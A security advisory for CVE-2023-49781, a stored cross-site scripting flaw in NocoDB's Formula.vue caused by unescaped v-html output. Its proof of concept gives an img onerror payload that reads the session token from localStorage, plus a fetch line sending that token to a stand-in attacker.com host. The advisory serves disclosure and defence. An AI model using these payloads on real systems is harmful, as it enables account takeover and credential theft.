NocoDB Vulnerable to Stored Cross-Site Scripting in Formula.vue
GHSA-h6r4-xvw6-jc5h · CVE-2023-49781
Published · Modified
Description
Summary
A stored cross-site scripting vulnerability exists within the Formula virtual cell comments functionality.
Details
The nc-gui/components/virtual-cell/Formula.vue displays a v-html tag with the value of "urls" whose contents are processed by the function replaceUrlsWithLink(). This function recognizes the pattern URI::(XXX) and creates a hyperlink tag with href=XXX. However, it leaves all the other contents outside of the pattern URI::(XXX) unchanged, which makes the evil users can create a malicious table with a formula field whose payload is <img src=1 onerror="malicious javascripts"URI::(XXX). The evil users then can share this table with others by enabling public viewing and the victims who open the shared link can be attacked.
PoC
Step 1: Attacker login the nocodb and creates a table with two fields, "T" and "F". The type of field "T" is "SingleLineText", and the type of the "F" is "Fomula" with the formula content {T}
Step 2: The attacker sets the contents of T using <img src=1 onerror=alert(localStorage.getItem('nocodb-gui-v2'))URI::(XXX)
Step 3: The attacker clicks the "Share" button and enables public viewing, then copies the shared link and sends it to the victims
Step 4: Any victims who open the shared link in their browsers will see the alert with their confidential tokens stored in localStorage
The attackers can use the fetch(http://attacker.com/?localStorage.getItem('nocodb-gui-v2')) to replace the alert and then steal the victims' credentials in their attacker.com website.
Impact
Stealing the credentials of NocoDB user that clicks the malicious link.
Ready to move
Start Securing
Free, no credit card | First findings in minutes